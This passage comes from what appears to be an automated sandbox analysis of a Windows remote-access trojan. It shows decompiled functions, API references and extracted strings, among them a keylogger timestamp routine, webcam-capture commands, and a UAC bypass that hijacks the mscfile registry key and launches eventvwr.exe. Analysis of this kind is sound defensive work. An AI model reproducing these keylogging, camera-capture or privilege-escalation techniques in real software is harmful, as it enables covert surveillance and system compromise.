				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                  0x00401cd9
                                  0x00401cdf
                                  0x00401cf1
                                  0x00401d01
                                  0x00401d10
                                  0x00401d1a
                                  0x00401d21
                                  0x00401d24
                                  0x00401d27
                                  0x00401e08
                                  0x00401e0f
                                  0x00401e1b
                                  0x00401e1e
                                  0x00401e20
                                  0x00401e33
                                  0x00401e43
                                  0x00401e53
                                  0x00401e60
                                  0x00401e67
                                  0x00401e73
                                  0x00401e79
                                  0x00000000
                                  0x00401e79
                                  0x00401d2d
                                  0x00401d2d
                                  0x00401d2e
                                  0x00401df4
                                  0x00401dfb
                                  0x00000000
                                  0x00401e01
                                  0x00401d34
                                  0x00401d34
                                  0x00401d35
                                  0x00401de2
                                  0x00401de8
                                  0x00401d3b
                                  0x00401d3b
                                  0x00401d3c
                                  0x00401d92
                                  0x00401d98
                                  0x00401d9a
                                  0x00401d9f
                                  0x00000000
                                  0x00401da1
                                  0x00401da1
                                  0x00401da6
                                  0x00401dad
                                  0x00401dba
                                  0x00401dbb
                                  0x00401dbe
                                  0x00401dc3
                                  0x00401d3e
                                  0x00401d3f
                                  0x00401d45
                                  0x00401d4b
                                  0x00401d4d
                                  0x00401d52
                                  0x00401dcb
                                  0x00401dd5
                                  0x00401ddb
                                  0x00401e7b
                                  0x00401e7e
                                  0x00401d54
                                  0x00401d59
                                  0x00401d60
                                  0x00401d67
                                  0x00401d6f
                                  0x00401d76
                                  0x00401d80
                                  0x00401d87
                                  0x00401d87
                                  0x00401d52
                                  0x00401d3f
                                  0x00401d3c
                                  0x00401d35
                                  0x00401d2e
                                  0x00401e86
                                  0x00401e8e
                                  0x00401e97
                                  0x00401ea1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401CF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                  • atoi.MSVCRT ref: 00401D67
                                  • Sleep.KERNEL32 ref: 00401D76
                                    • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                    • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                    • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                  • atoi.MSVCRT ref: 00401DB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                  • API String ID: 3050406488-3547787478
                                  • Opcode ID: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                  • Opcode Fuzzy Hash: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DD3, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E00405DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L00414176();
				_t25 =  &_v36;
				L00414170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                  0x00405dde
                                  0x00405de1
                                  0x00405df0
                                  0x00405df9
                                  0x00405e02
                                  0x00405e06
                                  0x00405e12
                                  0x00405e1b
                                  0x00405e24
                                  0x00405e2d
                                  0x00405e3d
                                  0x00405e5c
                                  0x00405e61
                                  0x00405e69
                                  0x00405e76
                                  0x00405e7c
                                  0x00405e7c
                                  0x00405e86
                                  0x00405e8c
                                  0x00405e92
                                  0x00405e95
                                  0x00405e95
                                  0x00405e9c
                                  0x00405ea6
                                  0x00405eaf

                                  APIs
                                  • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                  • malloc.MSVCRT ref: 00405E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                  • sprintf.MSVCRT ref: 00405E69
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                  • SetEvent.KERNEL32(00000000), ref: 00405E95
                                  • free.MSVCRT(00000000), ref: 00405E9C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 2201004561-248792730
                                  • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                  • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040122D, Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                  • closesocket.WS2_32 ref: 00401266
                                  • ExitThread.KERNEL32 ref: 00401274
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(Function_0001B218,00000012,?,0041B310,00000000), ref: 004012B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                  • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                  • String ID:
                                  • API String ID: 3470141593-0
                                  • Opcode ID: 8c77ea33ad519ed9651320f964817777c92f5b7bf297cb9656444f3f3f4721e9
                                  • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                  • Opcode Fuzzy Hash: 8c77ea33ad519ed9651320f964817777c92f5b7bf297cb9656444f3f3f4721e9
                                  • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402637, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 94timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00402637(void* __ecx, intOrPtr _a4) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				char _v56;
				char* _t42;
				char* _t43;
				char* _t50;
				char* _t51;
				void* _t68;
				void* _t69;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x38)) == 0) {
					return 0;
				}
				if( *0x41bcac != 0) {
					if( *((char*)(__ecx + 0x44)) != 0) {
						GetLocalTime( &_v24);
						_t50 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t51 =  &_v40;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
						printf(_t51);
						_t69 = _t69 + 0x24;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
					}
					_t16 = _t68 + 0x3c; // 0xa
					if( *_t16 != _a4) {
						GetLocalTime( &_v24);
						_t42 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t43 =  &_v56;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
						printf(_t43);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
				return 1;
			}













                                  0x0040263e
                                  0x00402644
                                  0x00000000
                                  0x00402749
                                  0x00402653
                                  0x00402669
                                  0x0040266f
                                  0x0040268b
                                  0x00402699
                                  0x004026a0
                                  0x004026a4
                                  0x004026ae
                                  0x004026b5
                                  0x004026b7
                                  0x004026bd
                                  0x004026c6
                                  0x004026cc
                                  0x004026cc
                                  0x004026d0
                                  0x004026d6
                                  0x004026dc
                                  0x004026f8
                                  0x00402706
                                  0x0040270d
                                  0x00402711
                                  0x0040271b
                                  0x00402722
                                  0x0040272a
                                  0x00402733
                                  0x00402733
                                  0x004026d6
                                  0x0040273c
                                  0x00402740
                                  0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                  • printf.MSVCRT ref: 004026B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                  • printf.MSVCRT ref: 00402722
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                  • API String ID: 1710008465-2297210016
                                  • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                  • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030EC, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?), ref: 0040318F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                  • exit.MSVCRT ref: 004031D8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                  Strings
                                  • open, xrefs: 004031C6
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040318A
                                  • mscfile\shell\open\command, xrefs: 0040311C
                                  • eventvwr.exe, xrefs: 004031A6
                                  • origmsc, xrefs: 00403160
                                  • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                  • API String ID: 2587331422-2529038204
                                  • Opcode ID: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                  • Opcode Fuzzy Hash: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D64E, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
